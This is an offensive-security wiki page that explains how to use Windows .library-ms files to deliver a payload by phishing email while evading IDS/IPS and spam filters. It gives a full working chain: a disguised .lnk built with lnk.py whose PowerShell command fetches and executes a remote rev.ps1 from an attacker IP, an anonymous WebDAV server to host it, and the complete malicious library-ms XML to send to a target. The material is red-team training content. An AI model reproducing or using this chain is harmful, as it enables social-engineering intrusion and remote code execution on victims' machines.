Infiltr8ForumGitHub

Windows Library Files

Theory

Windows Library files (.library-ms files) are a virtual container for user content. It can be used to point to a remote or local storage location.

We may send this file by e-mail and use social engineering to get the recipient to open the container (it will appear as a normal directory in Windows Explorer) and then to double-click on our hosted payload to execute it.

By delivering our payload via a Windows Library File rather than directly sending a link directly to a remote server hosting our payload, we may avoid IDS/IPS/Anti-spam solutions.

When SearchConnectorDescription section of the library-ms file points to a remote location, it will force authentication through explorer when opening the container folder.

Practice

In this scenario, we'll create a .library-ms file pointing to our WebDAV server that is hosting a malicious .lnk file. The user will need to open both container and shortcut files to execute our payload.

First, let's create our malicious .lnk shortcut using lnk.py (Python). 

# -a : Arguments
# -i : Icon location
python2.7 lnk.py evil.lnk 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-c "iex(iwr http://192.168.45.225/rev.ps1 -UseBasicParsing)"' -i 'C:\Windows\System32\Notepad.exe'

Then, start a WebDAV server to host our payload

# Install with: sudo apt install python3-wsgidav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

We can now create our evil.library-ms file with the following content

evil.library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ATTACKING_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

If you created this file on linux, we may need to change the text encoding as follow

unix2dos evil.library-ms

We can now send the evil.library-ms file to the target !

Resources

LogoFilesec.io

Last updated

Was this helpful?